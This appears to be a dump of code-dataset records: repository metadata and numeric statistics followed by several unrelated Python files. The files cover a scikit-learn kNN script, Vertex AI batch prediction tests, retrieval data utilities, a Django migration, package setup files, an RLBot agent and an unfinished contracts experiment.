| 38.323432 | 79 | 0.673527 | 1,161 | 11,612 | 6.445306 | 0.18863 | 0.013364 | 0.048109 | 0.051316 | 0.458773 | 0.362021 | 0.297875 | 0.289189 | 0.289189 | 0.246559 | 0 | 0.006266 | 0.244058 | 11,612 | 302 | 80 | 38.450331 | 0.846206 | 0.058388 | 0 | 0.384 | 0 | 0 | 0.239923 | 0.074936 | 0 | 0 | 0 | 0.003311 | 0 | 1 | 0.088 | false | 0.068 | 0.048 | 0.012 | 0.172 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
4022d54aeba2badfe2c92ef3c771f491343dff82 | 1,919 | py | Python | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | teste/knn.py | joandesonandrade/nebulosa | 5bc157322ed0bdb81f6f00f6ed1ea7f7a5cadfe0 | [
"MIT"
] | null | null | null | from sklearn import preprocessing
import pandas as pd
import numpy as np
#import matplotlib.pyplot as plt
#Abrindo o dados como Dataframe
dados = pd.read_csv('dados/001.csv')
#Iniciando o método para binanizar as classe sim=1; não=0
pre = preprocessing.LabelBinarizer()
#Binazirando a classe jogou, e atribuíndo a uma matriz n-dimencional
y_binary = pre.fit_transform(dados['jogou'])
y = np.array(y_binary).ravel()
lista_clima = [x for x in dados['clima']]
lista_temperatura = [x for x in dados['temperatura']]
lista_jogou = [x for x in dados['jogou']]
pre = preprocessing.LabelEncoder()
clima_encoding = pre.fit_transform(lista_clima)
temperatura_encoding = pre.fit_transform(lista_temperatura)
jogou_encoding = pre.fit_transform(lista_jogou)
lista = list(zip(clima_encoding, temperatura_encoding, jogou_encoding))
X = np.array(lista, dtype=np.int32)
#colunas = ['A', 'B', 'C']
# print(pd.DataFrame(X, columns=colunas, dtype=np.int32))
# print(pd.DataFrame(y, columns=['Classe'], dtype=np.int32))
#
# xX = []
# for i, x in enumerate(X):
# xX.append([list(x), y[i][0]])
#
# dX = [(x[0][0] + x[0][1] + x[0][2]) for x in xX]
# dY = [x[1] for x in xX]
#
# print('Soma dos rótulos:', dX)
# print('Classe:', dY)
#
# fig, ax = plt.subplots()
# ax.plot(dX)
# ax.plot(dY)
# plt.show()
from sklearn import model_selection
from sklearn.metrics import accuracy_score
from sklearn.neighbors import KNeighborsClassifier
#Dividido os dados, onde o treinamento ficará com 75% e teste 25%, eu sempre uso este padrão :)
X_train, X_test, y_train, y_test = model_selection.train_test_split(X, y, test_size=0.25, random_state=0)
#Gerando o modelo, vou deixar os parâmetros padrão
knn = KNeighborsClassifier()
#Treinando o modelo
knn.fit(X=X_train, y=y_train)
#Avaliando a pontuação do modelo, usando os dados de teste
pontuacao = str(accuracy_score(y_test, knn.predict(X_test)) * 100)
print("Precisão: "+pontuacao+"%")
| 28.641791 | 105 | 0.727983 | 308 | 1,919 | 4.422078 | 0.396104 | 0.013216 | 0.022026 | 0.015419 | 0.088106 | 0 | 0 | 0 | 0 | 0 | 0 | 0.01804 | 0.133403 | 1,919 | 66 | 106 | 29.075758 | 0.800962 | 0.414278 | 0 | 0 | 0 | 0 | 0.045537 | 0 | 0 | 0 | 0 | 0.015152 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0.041667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
40255e51d495409353d842161452761a11a4b039 | 8,940 | py | Python | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | components/google-cloud/tests/container/experimental/gcp_launcher/test_batch_prediction_job_remote_runner.py | m-mayran/pipelines | 4e89973504980ff89d896fda09fc29a339b2d744 | [
"Apache-2.0"
] | null | null | null | # Copyright 2021 The Kubeflow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test Vertex AI Batch Prediction Job Remote Runner Client module."""
import json
from logging import raiseExceptions
import os
import time
import unittest
from unittest import mock
from google.cloud import aiplatform
from google.cloud.aiplatform.compat.types import job_state as gca_job_state
from google.protobuf import json_format
from google_cloud_pipeline_components.proto.gcp_resources_pb2 import GcpResources
from google_cloud_pipeline_components.container.experimental.gcp_launcher import batch_prediction_job_remote_runner
from google_cloud_pipeline_components.container.experimental.gcp_launcher import job_remote_runner
class BatchPredictionJobRemoteRunnerUtilsTests(unittest.TestCase):
def setUp(self):
super(BatchPredictionJobRemoteRunnerUtilsTests, self).setUp()
self._payload = (
'{"batchPredictionJob": {"displayName": '
'"BatchPredictionComponentName", "model": '
'"projects/test/locations/test/models/test-model","inputConfig":'
' {"instancesFormat": "CSV","gcsSource": {"uris": '
'["test_gcs_source"]}}, "outputConfig": {"predictionsFormat": '
'"CSV", "gcsDestination": {"outputUriPrefix": '
'"test_gcs_destination"}}}}')
self._job_type = 'BatchPredictionJob'
self._project = 'test_project'
self._location = 'test_region'
self._batch_prediction_job_name = '/projects/{self._project}/locations/{self._location}/jobs/test_job_id'
self._gcp_resources_path = 'gcp_resources'
self._batch_prediction_job_uri_prefix = f'https://{self._location}-aiplatform.googleapis.com/v1/'
def tearDown(self):
if os.path.exists(self._gcp_resources_path):
os.remove(self._gcp_resources_path)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
def test_batch_prediction_job_remote_runner_on_region_is_set_correctly_in_client_options(
self, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
mock_job_service_client.assert_called_once_with(
client_options={
'api_endpoint': 'test_region-aiplatform.googleapis.com'
},
client_info=mock.ANY)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_on_payload_deserializes_correctly(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
expected_parent = f'projects/{self._project}/locations/{self._location}'
expected_job_spec = json.loads(self._payload, strict=False)
job_client.create_batch_prediction_job.assert_called_once_with(
parent=expected_parent, batch_prediction_job=expected_job_spec)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_raises_exception_on_error(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response = mock.Mock()
job_client.get_batch_prediction_job.return_value = get_batch_prediction_job_response
get_batch_prediction_job_response.state = gca_job_state.JobState.JOB_STATE_FAILED
mock_path_exists.return_value = False
with self.assertRaises(RuntimeError):
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
@mock.patch.object(time, 'sleep', autospec=True)
def test_batch_prediction_job_remote_runner_retries_to_get_status_on_non_completed_job(
self, mock_time_sleep, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
get_batch_prediction_job_response_running = mock.Mock()
get_batch_prediction_job_response_running.state = gca_job_state.JobState.JOB_STATE_RUNNING
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_running,
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
mock_time_sleep.assert_called_once_with(
job_remote_runner._POLLING_INTERVAL_IN_SECONDS)
self.assertEqual(job_client.get_batch_prediction_job.call_count, 2)
@mock.patch.object(aiplatform.gapic, 'JobServiceClient', autospec=True)
@mock.patch.object(os.path, 'exists', autospec=True)
def test_batch_prediction_job_remote_runner_returns_gcp_resources(
self, mock_path_exists, mock_job_service_client):
job_client = mock.Mock()
mock_job_service_client.return_value = job_client
create_batch_prediction_job_response = mock.Mock()
job_client.create_batch_prediction_job.return_value = create_batch_prediction_job_response
create_batch_prediction_job_response.name = self._batch_prediction_job_name
get_batch_prediction_job_response_success = mock.Mock()
get_batch_prediction_job_response_success.state = gca_job_state.JobState.JOB_STATE_SUCCEEDED
job_client.get_batch_prediction_job.side_effect = [
get_batch_prediction_job_response_success
]
mock_path_exists.return_value = False
batch_prediction_job_remote_runner.create_batch_prediction_job(
self._job_type, self._project, self._location, self._payload,
self._gcp_resources_path)
with open(self._gcp_resources_path) as f:
serialized_gcp_resources = f.read()
# Instantiate GCPResources Proto
batch_prediction_job_resources = json_format.Parse(
serialized_gcp_resources, GcpResources())
self.assertEqual(len(batch_prediction_job_resources.resources), 1)
batch_prediction_job_name = batch_prediction_job_resources.resources[
0].resource_uri[len(self._batch_prediction_job_uri_prefix):]
self.assertEqual(batch_prediction_job_name,
self._batch_prediction_job_name)
| 45.380711 | 115 | 0.794519 | 1,169 | 8,940 | 5.59367 | 0.179641 | 0.176633 | 0.211959 | 0.131213 | 0.669827 | 0.638324 | 0.590151 | 0.579599 | 0.579599 | 0.572106 | 0 | 0.001673 | 0.130872 | 8,940 | 196 | 116 | 45.612245 | 0.839897 | 0.075615 | 0 | 0.514286 | 0 | 0 | 0.086113 | 0.04148 | 0 | 0 | 0 | 0 | 0.05 | 1 | 0.05 | false | 0 | 0.085714 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
402c6d1527bb64bf420904254134ab7105236ec8 | 10,690 | py | Python | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 47 | 2020-08-02T12:28:07.000Z | 2022-03-30T01:56:57.000Z | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 4 | 2020-09-20T17:31:51.000Z | 2021-12-02T17:40:03.000Z | data_utils.py | algoprog/Quin | c1fd3b8e5e2163217f6c8062620ee0c1dfeed0e8 | [
"MIT"
] | 4 | 2020-11-23T15:47:34.000Z | 2021-03-30T02:02:02.000Z | import csv
import json
import pickle
import logging
import re
import pandas
import gzip
import os
import numpy as np
from random import randint, random
from tqdm import tqdm
from retriever.dense_retriever import DenseRetriever
from models.tokenization import tokenize
from typing import Union, List
class InputExample:
"""
Structure for one input example with texts, the label and a unique id
"""
def __init__(self, guid: str, texts: List[str], label: Union[int, float]):
"""
Creates one InputExample with the given texts, guid and label
str.strip() is called on both texts.
:param guid
id for the example
:param texts
the texts for the example
:param label
the label for the example
"""
self.guid = guid
self.texts = [text.strip() for text in texts]
self.label = label
def get_texts(self):
return self.texts
def get_label(self):
return self.label
class LoggingHandler(logging.Handler):
def __init__(self, level=logging.NOTSET):
super().__init__(level)
def emit(self, record):
try:
msg = self.format(record)
tqdm.write(msg)
self.flush()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def get_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['label']
guid = "%s-%d" % (filename, id)
id += 1
if label == 'entailment':
label = 0
elif label == 'contradiction':
label = 1
else:
label = 2
examples.append(InputExample(guid=guid,
texts=[sample['s1'], sample['s2']],
label=label))
if 0 < max_examples <= len(examples):
break
return examples
def get_qa_examples(filename, max_examples=0, dev=False):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['relevant']
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=label))
if not dev:
if label == 1:
for _ in range(13):
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=label))
if 0 < max_examples <= len(examples):
break
return examples
def map_label(label):
labels = {"relevant": 0, "irrelevant": 1}
return labels[label.strip().lower()]
def get_qar_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['question'], sample['answer']],
label=1.0))
if 0 < max_examples <= len(examples):
break
return examples
def get_qar_artificial_examples():
examples = []
id = 0
print('Loading passages...')
passages = []
file = open('data/msmarco/collection.tsv', 'r', encoding='utf8')
while True:
line = file.readline()
if not line:
break
line = line.rstrip('\n').split('\t')
passages.append(line[1])
print('Loaded passages')
with open('data/qar/qar_artificial_queries.csv') as f:
for i, line in enumerate(f):
queries = line.rstrip('\n').split('|')
for query in queries:
guid = "%s-%d" % ('', id)
id += 1
examples.append(InputExample(guid=guid,
texts=[query, passages[i]],
label=1.0))
return examples
def get_single_examples(filename, max_examples=0):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['text']],
label=1))
if 0 < max_examples <= len(examples):
break
return examples
def get_qnli_examples(filename, max_examples=0, no_contradictions=False, fever_only=False):
examples = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
label = sample['label']
if label == 'contradiction' and no_contradictions:
continue
if sample['evidence'] == '':
continue
if fever_only and sample['source'] != 'fever':
continue
guid = "%s-%d" % (filename, id)
id += 1
examples.append(InputExample(guid=guid,
texts=[sample['statement'].strip(), sample['evidence'].strip()],
label=1.0))
if 0 < max_examples <= len(examples):
break
return examples
def get_retrieval_examples(filename, negative_corpus='data/msmarco/collection.tsv', max_examples=0, no_statements=True,
encoder_model=None, negative_samples_num=4):
examples = []
queries = []
passages = []
negative_passages = []
id = 0
with open(filename, encoding='utf8') as file:
for j, line in enumerate(file):
line = line.rstrip('\n')
sample = json.loads(line)
if 'evidence' in sample and sample['evidence'] == '':
continue
guid = "%s-%d" % (filename, id)
id += 1
if sample['type'] == 'question':
query = sample['question']
passage = sample['answer']
else:
query = sample['statement']
passage = sample['evidence']
query = query.strip()
passage = passage.strip()
if sample['type'] == 'statement' and no_statements:
continue
queries.append(query)
passages.append(passage)
if sample['source'] == 'natural-questions':
negative_passages.append(passage)
if max_examples == len(passages):
break
if encoder_model is not None:
# Load MSMARCO passages
logging.info('Loading MSM passages...')
with open(negative_corpus) as file:
for line in file:
p = line.rstrip('\n').split('\t')[1]
negative_passages.append(p)
logging.info('Building ANN index...')
dense_retriever = DenseRetriever(model=encoder_model, batch_size=1024, use_gpu=True)
dense_retriever.create_index_from_documents(negative_passages)
results = dense_retriever.search(queries=queries, limit=100, probes=256)
negative_samples = [
[negative_passages[p[0]] for p in r if negative_passages[p[0]] != passages[i]][:negative_samples_num]
for i, r in enumerate(results)
]
# print(queries[0])
# print(negative_samples[0][0])
for i in range(len(queries)):
texts = [queries[i], passages[i]] + negative_samples[i]
examples.append(InputExample(guid=guid,
texts=texts,
label=1.0))
else:
for i in range(len(queries)):
texts = [queries[i], passages[i]]
examples.append(InputExample(guid=guid,
texts=texts,
label=1.0))
return examples
def get_pair_input(tokenizer, sent1, sent2, max_len=256):
text = "[CLS] {} [SEP] {} [SEP]".format(sent1, sent2)
tokenized_text = tokenizer.tokenize(text)[:max_len]
indexed_tokens = tokenizer.encode(text)[:max_len]
segments_ids = []
sep_flag = False
for i in range(len(tokenized_text)):
if tokenized_text[i] == '[SEP]' and not sep_flag:
segments_ids.append(0)
sep_flag = True
elif sep_flag:
segments_ids.append(1)
else:
segments_ids.append(0)
return indexed_tokens, segments_ids
def build_batch(tokenizer, text_list, max_len=256):
token_id_list = []
segment_list = []
attention_masks = []
longest = -1
for pair in text_list:
sent1, sent2 = pair
ids, segs = get_pair_input(tokenizer, sent1, sent2, max_len=max_len)
if ids is None or segs is None:
continue
token_id_list.append(ids)
segment_list.append(segs)
attention_masks.append([1] * len(ids))
if len(ids) > longest:
longest = len(ids)
if len(token_id_list) == 0:
return None, None, None
# padding
assert (len(token_id_list) == len(segment_list))
for ii in range(len(token_id_list)):
token_id_list[ii] += [0] * (longest - len(token_id_list[ii]))
attention_masks[ii] += [1] * (longest - len(attention_masks[ii]))
segment_list[ii] += [1] * (longest - len(segment_list[ii]))
return token_id_list, segment_list, attention_masks
def load_unsupervised_dataset(dataset_file):
print('Loading dataset...')
x = pickle.load(open(dataset_file, "rb"))
print('Done')
return x, len(x[0])
def load_supervised_dataset(dataset_file):
print('Loading dataset...')
d = pickle.load(open(dataset_file, "rb"))
print('Done')
return d[0], d[1]
| 31.627219 | 119 | 0.528718 | 1,172 | 10,690 | 4.703925 | 0.180887 | 0.023943 | 0.017958 | 0.048975 | 0.40468 | 0.377109 | 0.363686 | 0.334482 | 0.310539 | 0.287321 | 0 | 0.014142 | 0.358372 | 10,690 | 337 | 120 | 31.721068 | 0.789619 | 0.034425 | 0 | 0.435115 | 0 | 0 | 0.057023 | 0.008705 | 0 | 0 | 0 | 0 | 0.003817 | 1 | 0.064886 | false | 0.072519 | 0.053435 | 0.007634 | 0.183206 | 0.022901 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
402d9bbc776d0b10c128c8af7e8de8955e864e57 | 327 | py | Python | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | 1 | 2021-06-10T23:14:00.000Z | 2021-06-10T23:14:00.000Z | hc/accounts/migrations/0025_remove_member_team.py | opsct/healthchecks | 069bc9b735c0473aed9946104ab85238d065bea1 | [
"BSD-3-Clause"
] | null | null | null | # Generated by Django 2.1.5 on 2019-01-22 08:33
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('accounts', '0024_auto_20190119_1540'),
]
operations = [
migrations.RemoveField(
model_name='member',
name='team',
),
]
| 18.166667 | 48 | 0.590214 | 35 | 327 | 5.4 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.134783 | 0.296636 | 327 | 17 | 49 | 19.235294 | 0.686957 | 0.137615 | 0 | 0 | 1 | 0 | 0.146429 | 0.082143 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.363636 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403251bad5543a2ea9b5b81f85773876a2b6f3ba | 1,458 | py | Python | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | setup.py | pranithk/gluster-georep-tools | 3c8c7dcf63042613b002385edcead7c1ec079e61 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
gluster-georep-tools.setup.py
:copyright: (c) 2016 by Aravinda VK
:license: MIT, see LICENSE for more details.
"""
from setuptools import setup
setup(
name="gluster-georep-tools",
version="0.2",
packages=["gluster_georep_tools",
"gluster_georep_tools.status",
"gluster_georep_tools.setup"],
include_package_data=True,
install_requires=['argparse', 'paramiko', 'glustercli'],
entry_points={
"console_scripts": [
"gluster-georep-setup = gluster_georep_tools.setup.cli:main",
"gluster-georep-status = gluster_georep_tools.status.cli:main",
]
},
platforms="linux",
zip_safe=False,
author="Aravinda VK",
author_email="mail@aravindavk.in",
description="Gluster Geo-replication tools",
license="MIT",
keywords="gluster, tool, geo-replication",
url="https://github.com/aravindavk/gluster-georep-tools",
long_description="""
Gluster Geo-replication Tools
""",
classifiers=[
"Development Status :: 3 - Alpha",
"Topic :: Utilities",
"Environment :: Console",
"License :: OSI Approved :: MIT License",
"Operating System :: POSIX :: Linux",
"Programming Language :: Python",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 2 :: Only"
],
)
| 30.375 | 75 | 0.61454 | 151 | 1,458 | 5.81457 | 0.543046 | 0.148064 | 0.164009 | 0.078588 | 0.084282 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011743 | 0.240741 | 1,458 | 47 | 76 | 31.021277 | 0.781391 | 0.091221 | 0 | 0 | 0 | 0 | 0.559387 | 0.111111 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.026316 | 0 | 0.026316 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
403352816f5874a59e3b9fffa9b383a34c03d749 | 311 | py | Python | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | imgtoch/__init__.py | hrpzcf/imgtoch | 13b59dd4c6b65b8ee17bbd22ac1133a86d34d5fb | [
"MIT"
] | null | null | null | # coding: utf-8
from .__utils__ import grayscaleOf, makeImage, sortByGrayscale
NAME = "imgtoch"
VERSIONNUM = 0, 2, 3
VERSION = ".".join(map(str, VERSIONNUM))
AUTHOR = "hrpzcf"
EMAIL = "hrpzcf@foxmail.com"
WEBSITE = "https://gitee.com/hrpzcf/imgtoch"
__all__ = ["grayscaleOf", "makeImage", "sortByGrayscale"]
| 23.923077 | 62 | 0.717042 | 36 | 311 | 5.972222 | 0.777778 | 0.186047 | 0.325581 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014652 | 0.122187 | 311 | 12 | 63 | 25.916667 | 0.772894 | 0.041801 | 0 | 0 | 0 | 0 | 0.334459 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.125 | 0 | 0.125 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
4035dbde81734e9262f7a5d9f7fcf21b0a2fc083 | 1,006 | py | Python | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 13 | 2019-05-25T20:25:51.000Z | 2022-03-19T13:36:23.000Z | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 53 | 2019-06-07T13:31:59.000Z | 2022-03-28T22:53:47.000Z | RLBotPack/JoeyBot/CSharpPythonAgent/CSharpPythonAgent.py | RLMarvin/RLBotPack | c88c4111bf67d324b471ad87ad962e7bc8c2a202 | [
"MIT"
] | 78 | 2019-06-30T08:42:13.000Z | 2022-03-23T20:11:42.000Z | import os
from rlbot.agents.base_agent import BOT_CONFIG_AGENT_HEADER
from rlbot.agents.base_dotnet_agent import BaseDotNetAgent
from rlbot.parsing.custom_config import ConfigHeader, ConfigObject
class DotNetBot(BaseDotNetAgent):
def get_port_file_path(self):
# Look for a port.cfg file in the same directory as THIS python file.
return os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__), 'port.cfg'))
def load_config(self, config_header: ConfigHeader):
self.dotnet_executable_path = config_header.getpath('dotnet_executable_path')
self.logger.info(".NET executable is configured as {}".format(self.dotnet_executable_path))
@staticmethod
def create_agent_configurations(config: ConfigObject):
params = config.get_header(BOT_CONFIG_AGENT_HEADER)
params.add_value('dotnet_executable_path', str, default=None,
description='Relative path to the executable that runs the .NET executable.')
| 43.73913 | 102 | 0.744533 | 131 | 1,006 | 5.473282 | 0.480916 | 0.089261 | 0.111576 | 0.052999 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171968 | 1,006 | 22 | 103 | 45.727273 | 0.860744 | 0.0666 | 0 | 0 | 0 | 0 | 0.159018 | 0.046958 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.266667 | 0.066667 | 0.6 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
4036ce0b3a0763152669516459e91450d4954edb | 2,640 | py | Python | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | v3_experiments.py | runekaagaard/workflows | 7bb7fe3821bc33b5e82c65dda3ca61f69ee8bcfa | [
"Unlicense"
] | null | null | null | # coding=utf-8
import inspect
from functools import wraps
def listify(func_s):
if callable(func_s):
return [func_s]
else:
return func_s
def parse_conditions(condition_s, args, kwargs, title):
err_msg = unicode(title) + u" nr. {} failed: {}"
for i, condition in enumerate(listify(condition_s), 1):
assert condition(*args, **
kwargs) is not False, unicode(err_msg).format(
i, unicode(inspect.getsource(condition)))
def mark_takes_no_arguments(func):
func.takes_no_arguments = True
return func
def takes_no_arguments(func):
mark_takes_no_arguments(func)
return func
def contract(pre_conditions, post_conditions):
"""
Pre is before. Post is after.
"""
def _(func):
@wraps(func)
def __(*args, **kwargs):
parse_conditions(
pre_conditions, args, kwargs, title='Preconditions')
result = func(*args, **kwargs)
parse_conditions(
post_conditions, [result], {}, title='Postconditions')
return result
return __
return _
def processing(pre_process, post_process):
"Procemanns"
def _(func):
@wraps(func)
